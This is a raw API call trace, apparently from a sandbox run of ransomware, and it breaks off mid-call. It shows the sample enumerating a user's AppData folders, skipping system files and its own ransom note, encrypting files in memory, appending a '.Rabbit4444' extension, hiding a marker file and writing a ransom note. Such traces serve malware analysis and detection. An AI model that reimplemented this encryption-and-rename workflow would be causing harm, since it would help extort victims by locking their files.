lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings" [0060.760] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\" [0060.760] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" [0060.760] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0060.763] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0060.769] FlushFileBuffers (hFile=0x27c) returned 1 [0060.771] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.775] CloseHandle (hObject=0x27c) returned 1 [0060.776] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings") returned 81 [0060.776] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.776] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddce1aab, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x713d778b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xed89e1dd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0060.776] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.776] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.776] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.776] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.776] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddce1aab, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x713d778b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xed89e1dd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.776] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.776] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.776] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.776] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.776] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.776] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed89e1dd, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed89e1dd, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed8c4237, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.776] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.776] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.776] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdddc675b, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdddc675b, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xdddc675b, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0060.776] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.776] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.776] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0060.777] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0060.777] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0060.777] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0060.777] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0060.777] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0060.777] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0060.777] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0060.777] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0060.777] lstrcpyW (in: lpString1=0x130ebdc, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0060.777] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0060.778] lstrlenW (lpString="roaming.lock") returned 12 [0060.778] lstrlenW (lpString="Rabbit4444") returned 10 [0060.778] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0060.778] lstrlenW (lpString=".dll") returned 4 [0060.778] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0060.778] lstrlenW (lpString=".lnk") returned 4 [0060.778] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0060.778] lstrlenW (lpString=".ini") returned 4 [0060.778] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0060.778] lstrlenW (lpString=".sys") returned 4 [0060.778] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0060.778] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xddce1aab, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x3fd6f110, ftLastAccessTime.dwHighDateTime=0x1d32735, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0060.778] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.778] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.778] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0060.778] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0060.778] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0060.778] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0060.778] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0060.778] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0060.778] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0060.778] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0060.778] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0060.778] lstrcpyW (in: lpString1=0x130ebdc, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0060.778] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0060.781] lstrlenW (lpString="settings.dat") returned 12 [0060.781] lstrlenW (lpString="Rabbit4444") returned 10 [0060.781] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0060.781] lstrlenW (lpString=".dll") returned 4 [0060.781] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0060.781] lstrlenW (lpString=".lnk") returned 4 [0060.781] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0060.781] lstrlenW (lpString=".ini") returned 4 [0060.781] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0060.781] lstrlenW (lpString=".sys") returned 4 [0060.781] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0060.782] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0060.782] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0060.782] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15209262207) returned 1 [0060.782] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0060.782] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0060.782] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0060.782] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x29c [0060.783] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0060.788] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123760 [0060.788] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0060.788] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0060.788] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0060.788] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x123760 [0060.788] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0060.788] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0060.788] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0060.788] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15209888197) returned 1 [0060.788] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0060.788] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0060.788] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.788] CloseHandle (hObject=0x29c) returned 1 [0060.788] CloseHandle (hObject=0x2a0) returned 1 [0060.789] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444") returned 105 [0060.789] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0060.789] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3fc3de50, ftCreationTime.dwHighDateTime=0x1d32735, ftLastAccessTime.dwLowDateTime=0x3fc3de50, ftLastAccessTime.dwHighDateTime=0x1d32735, ftLastWriteTime.dwLowDateTime=0x3fc3de50, ftLastWriteTime.dwHighDateTime=0x1d32735, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0060.789] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.789] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.789] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="Rabbit4444.exe") returned 1 [0060.789] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".") returned 1 [0060.789] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="..") returned 1 [0060.789] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="windows") returned -1 [0060.789] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="bootmgr") returned 1 [0060.789] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="pagefile.sys") returned 1 [0060.789] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="boot") returned 1 [0060.790] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="ids.txt") returned 1 [0060.790] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="NTUSER.DAT") returned 1 [0060.790] lstrcpyW (in: lpString1=0x130ebdc, lpString2="settings.dat.LOG1" | out: lpString1="settings.dat.LOG1") returned="settings.dat.LOG1" [0060.790] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\settings.dat.LOG1", dwFileAttributes=0x22) returned 1 [0060.790] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\settings.dat.LOG1", dwFileAttributes=0x6) returned 1 [0060.790] lstrlenW (lpString="settings.dat.LOG1") returned 17 [0060.791] lstrlenW (lpString="Rabbit4444") returned 10 [0060.791] lstrcmpiW (lpString1="s.dat.LOG1", lpString2="Rabbit4444") returned 1 [0060.791] lstrlenW (lpString=".dll") returned 4 [0060.791] lstrcmpiW (lpString1="LOG1", lpString2=".dll") returned 1 [0060.791] lstrlenW (lpString=".lnk") returned 4 [0060.791] lstrcmpiW (lpString1="LOG1", lpString2=".lnk") returned 1 [0060.791] lstrlenW (lpString=".ini") returned 4 [0060.791] lstrcmpiW (lpString1="LOG1", lpString2=".ini") returned 1 [0060.791] lstrlenW (lpString=".sys") returned 4 [0060.791] lstrcmpiW (lpString1="LOG1", lpString2=".sys") returned 1 [0060.791] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\settings\\settings.dat.log1"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0060.791] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0060.791] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15210185981) returned 1 [0060.791] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0060.791] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0060.791] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0060.791] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x29c [0060.792] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0060.793] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x123760 [0060.793] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0060.794] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0060.794] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0060.794] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x123760 [0060.794] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0060.794] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0060.794] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0060.794] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15210468301) returned 1 [0060.794] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0060.794] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0060.794] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.794] CloseHandle (hObject=0x29c) returned 1 [0060.794] CloseHandle (hObject=0x2a0) returned 1 [0060.794] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\settings.dat.LOG1.Rabbit4444") returned 110 [0060.794] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\settings\\settings.dat.log1"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\settings.dat.LOG1.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\settings\\settings.dat.log1.rabbit4444"), dwFlags=0x1) returned 1 [0060.795] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3fc3de50, ftCreationTime.dwHighDateTime=0x1d32735, ftLastAccessTime.dwLowDateTime=0x3fc3de50, ftLastAccessTime.dwHighDateTime=0x1d32735, ftLastWriteTime.dwLowDateTime=0x3fc3de50, ftLastWriteTime.dwHighDateTime=0x1d32735, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0060.795] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.795] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.795] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="Rabbit4444.exe") returned 1 [0060.795] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".") returned 1 [0060.795] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="..") returned 1 [0060.795] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="windows") returned -1 [0060.795] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="bootmgr") returned 1 [0060.795] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="pagefile.sys") returned 1 [0060.795] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="boot") returned 1 [0060.795] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="ids.txt") returned 1 [0060.795] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="NTUSER.DAT") returned 1 [0060.795] lstrcpyW (in: lpString1=0x130ebdc, lpString2="settings.dat.LOG2" | out: lpString1="settings.dat.LOG2") returned="settings.dat.LOG2" [0060.795] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\settings.dat.LOG2", dwFileAttributes=0x22) returned 1 [0060.796] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\settings.dat.LOG2", dwFileAttributes=0x6) returned 1 [0060.796] lstrlenW (lpString="settings.dat.LOG2") returned 17 [0060.796] lstrlenW (lpString="Rabbit4444") returned 10 [0060.796] lstrcmpiW (lpString1="s.dat.LOG2", lpString2="Rabbit4444") returned 1 [0060.796] lstrlenW (lpString=".dll") returned 4 [0060.796] lstrcmpiW (lpString1="LOG2", lpString2=".dll") returned 1 [0060.796] lstrlenW (lpString=".lnk") returned 4 [0060.796] lstrcmpiW (lpString1="LOG2", lpString2=".lnk") returned 1 [0060.796] lstrlenW (lpString=".ini") returned 4 [0060.796] lstrcmpiW (lpString1="LOG2", lpString2=".ini") returned 1 [0060.796] lstrlenW (lpString=".sys") returned 4 [0060.796] lstrcmpiW (lpString1="LOG2", lpString2=".sys") returned 1 [0060.796] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3fc3de50, ftCreationTime.dwHighDateTime=0x1d32735, ftLastAccessTime.dwLowDateTime=0x3fc3de50, ftLastAccessTime.dwHighDateTime=0x1d32735, ftLastWriteTime.dwLowDateTime=0x3fc3de50, ftLastWriteTime.dwHighDateTime=0x1d32735, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0060.796] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0060.796] lstrcpyW (in: lpString1=0x130ebdc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.796] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0060.796] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0060.797] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.798] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.798] CloseHandle (hObject=0x2a0) returned 1 [0060.798] CloseHandle (hObject=0x27c) returned 1 [0060.798] GetCurrentThreadId () returned 0xd98 [0060.798] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0060.798] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\RoamingState" [0060.798] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123b20 | out: hHeap=0xe0000) returned 1 [0060.798] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0060.798] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\RoamingState" [0060.798] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\RoamingState\\" [0060.798] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" [0060.798] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 